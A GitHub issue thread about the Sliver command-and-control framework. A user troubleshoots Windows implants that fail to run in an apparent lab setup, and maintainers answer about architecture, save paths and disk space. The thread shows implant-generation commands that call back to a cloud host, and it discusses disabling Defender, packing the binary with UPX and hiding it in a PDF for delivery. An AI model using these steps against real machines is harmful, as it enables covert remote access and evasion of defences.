### ISSUE TITLE
Implant isn't working in Dell

### ISSUE THREAD

**Issue by jayhill365** [BishopFox/sliver#981]
Implant on Dell inspiron won't run, I get an error message this app can't run on your PC.

I wanted to use this for research in my lab environment i've setup.
1. Using a debian ec2 instance I spun up sliver 
2. Next I generated two different implants I ran: the following two commands
generate --mtls <ec2's Public IPv4 address> --os win 
generate --http <ec2's Public IPv4 address> --os win 

3. Next I started listener on sliver running mtls, & http
4. I moved the binary locally using scp
5. When I tried to run the binary
6. <img width="458" alt="Screen Shot 2022-11-01 at 12 26 59 PM" src="https://user-images.githubusercontent.com/19259608/199321257-720fe894-a6c4-4cd0-a5aa-7045c5a965c7.png">
7. After turning off defender , and disabling real time protection .
8. I still get 
![IMG_3687](https://user-images.githubusercontent.com/19259608/199322261-a7ebd174-c618-45ca-935e-e598006d7e4e.jpg)

**Expected behavior**
Was expecting to be able to get a shell but no sessions are running when i check back in sliver.
Maybe I'm configuring this wrong, can someone point me in the right direction. ?

<img width="463" alt="Screen Shot 2022-11-01 at 12 36 40 PM" src="https://user-images.githubusercontent.com/19259608/199322927-f111725f-eaeb-40fd-838e-42284d637b80.png">
<img width="185" alt="Screen Shot 2022-11-01 at 12 36 52 PM" src="https://user-images.githubusercontent.com/19259608/199322965-c2f13f18-ae83-4c1f-953a-f6125c8a986e.png">
<img width="566" alt="Screen Shot 2022-11-01 at 12 36 17 PM copy" src="https://user-images.githubusercontent.com/19259608/199323560-e1b99f30-12cb-4440-9375-7d40e463be54.png">

**Comment by rkervella** [comment]
"This app can't run on your PC" is usually an issue with the architecture of the program not matching one supported by the OS. Are you trying to run a 64 bit binary on a 32 bit operating system?

**Comment by jayhill365** [comment]
Yeah thanks @rkervella  I think that's exactly what I was doing , is there a separate flag I should be using ?

**Comment by jayhill365** [comment]
<img width="467" alt="Screen Shot 2022-11-01 at 2 13 38 PM" src="https://user-images.githubusercontent.com/19259608/199342781-9f2c15e5-e73c-4926-a3c9-28d474ed6c8f.png">

Now it seems to not be building correctly.

**Comment by moloch--** [comment]
You're attempting to save the file to a directory your user doesn't have access to, you can use `--save` to change the location of the saved file.

**Comment by jayhill365** [comment]
I think the reason it failed to build is because I ran out of space on the micro instance, going to spin another one up and try again

**Comment by jayhill365** [comment]
<img width="459" alt="Screen Shot 2022-11-01 at 3 01 20 PM" src="https://user-images.githubusercontent.com/19259608/199350218-cd98cc80-0a41-48bf-adc4-8f050923a170.png">

**Comment by rkervella** [comment]
Closing since it seems to be resolved.

**Comment by jayhill365** [comment]
IS there a way you recommend sending the binary? Was using anon file but it stopped working so I haven't tested if the binary works yet. Is there a way to make it smaller?

**Comment by rkervella** [comment]
> IS there a way you recommend sending the binary?

Payload delivery is a bit outside of scope of this project. I would usually host it on a server I control and download it from there.

> Is there a way to make it smaller?

You can compress it / pack it with a packer like UPX.

**Comment by jayhill365** [comment]
I was thinking of using something like https://github.com/superzerosec/evilpdf to hide it, not sure if it would work, thanks again @rkervella

**Comment by jayhill365** [comment]
When I run the implant on the HP still nothing happens as of now. When I'm generating the implant do I need to specify a port? EX: generate --http <ip:port> -a x64 --os win ? 

How can I debug this ?

**Comment by jayhill365** [comment]
<img width="350" alt="Screen Shot 2022-11-03 at 12 04 19 AM" src="https://user-images.githubusercontent.com/19259608/199663664-9c7eda9e-6a33-4166-b5c5-1951e5973fec.png">

Also for some reason the mac implants aren't compiling as exec files for some reason either.

**Comment by jayhill365** [comment]
<img width="460" alt="Screen Shot 2022-11-03 at 1 00 43 AM" src="https://user-images.githubusercontent.com/19259608/199671534-0122931e-8026-4830-8838-8bd4eb434570.png">
